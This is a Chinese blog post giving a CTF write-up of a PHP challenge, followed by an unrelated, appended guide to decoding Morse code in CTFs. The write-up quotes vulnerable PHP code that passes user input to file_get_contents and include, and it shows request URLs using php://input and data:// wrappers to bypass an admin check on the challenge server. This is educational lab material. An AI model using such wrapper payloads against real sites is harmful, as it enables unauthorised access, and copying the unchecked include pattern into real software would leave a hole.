[CTF]No.0002 莫桑比克-php是最好的语言(待完善)

本文介绍了一种利用PHP伪协议和data协议进行Web应用渗透的方法。通过构造特定的URL请求,绕过权限验证并获取后台敏感信息。文章详细展示了如何设置参数以触发包含文件的功能,并最终找到隐藏的flag。

莫桑比克-php是最好的语言

来源:HBCTF第一场WP
类别:php伪协议、data协议
来源:http://www.moonsos.com/post/256.html
用到工具:HxD(16进制编辑器) 或 winhex
     WINRAR 或 好压 (查看 CRC32)

题目地址:http://123.206.66.106(已失效)

右击查看源码

you are not admin ! 
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!<br>";
    include($file); //class.php
}else{
    echo "you are not admin ! ";
}
 -->

方法一:

先要加入user参数,而且要满足最后得到的user参数结果为 “the user is admin”,可以利用php伪协议:

http://123.206.66.106/index.php?user=php://input

同时利用Hackbar(一个火狐插件)发送post数据为

the user is admin

方法二:

也可以利用data协议:

http://123.206.66.106/?user=data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4=
dGhlIHVzZXIgaXMgYWRtaW4= base64解码后为the user is admin

得到如图界面:

查看源码得到flag

参考

file_get_contents()
php://
data://

原文:米安网

### CTF摩尔斯电码解题方法及工具 在CTF竞赛中,摩尔斯电码是一种常见的密码学题目类型。以下内容将详细介绍如何解密摩尔斯电码并提交FLAG。 #### 1. 摩尔斯电码基础 摩尔斯电码由点(·)和划(-)组成,用于传递信息的编码系统。每个字母、数字和标点符号都有对应的摩尔斯电码表示形式[^1]。例如,字母A的摩尔斯电码为`.-`,数字1为`.----`。字母之间通过短停顿分隔,单词之间用较长停顿分隔。 #### 2. 解码工具 解码摩尔斯电码可以使用多种工具和方法。以下是常用的工具: - **在线解码器**:许多网站提供摩尔斯电码的在线解码功能。用户只需输入摩尔斯电码字符串,即可获得解码后的明文。 - **Python脚本**:编写自定义脚本实现摩尔斯电码的解码。以下是一个简单的Python示例代码: ```python morse_code_dict = { '.-': 'A', '-...': 'B', '-.-.': 'C', '-..': 'D', '.': 'E', '..-.': 'F', '--.': 'G', '....': 'H', '..': 'I', '.---': 'J', '-.-': 'K', '.-..': 'L', '--': 'M', '-.': 'N', '---': 'O', '.--.': 'P', '--.-': 'Q', '.-.': 'R', '...': 'S', '-': 'T', '..-': 'U', '...-': 'V', '.--': 'W', '-..-': 'X', '-.--': 'Y', '--..': 'Z', '-----': '0', '.----': '1', '..---': '2', '...--': '3', '....-': '4', '.....': '5', '-....': '6', '--...': '7', '---..': '8', '----.': '9' } def decode_morse(morse_code): morse_code = morse_code.strip().split(' ') decoded_message = ''.join([morse_code_dict[char] if char in morse_code_dict else '' for char in morse_code]) return decoded_message # 示例输入 morse_code = ".... . .-.. .--. ... ---" decoded_message = decode_morse(morse_code) print(decoded_message) # 输出: HELPSO ``` #### 3. 音频隐写分析 在某些CTF题目中,摩尔斯电码可能隐藏在音频文件中。此时需要借助音频处理工具进行分析[^2]。常用工具包括: - **Audacity**:开源音频处理软件,支持分析音频的频谱和波形。 - **MP3Stego**:专门用于音频数据分析和隐写检测的工具。 #### 4. 提交FLAG 解码完成后,通常需要将结果以特定格式提交至CTF平台。大多数情况下,FLAG格式为`flag{}`或`ctf{}`,具体格式需根据题目要求确定。 #### 5. 实战靶场推荐 为了提升解题能力,可以尝试以下CTF实战靶场[^3]: - **CTFTime**:全球CTF比赛信息汇总平台。 - **HackTheBox**:提供真实环境下的渗透测试练习。 - **OverTheWire**:专注于各种类型的CTF挑战。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值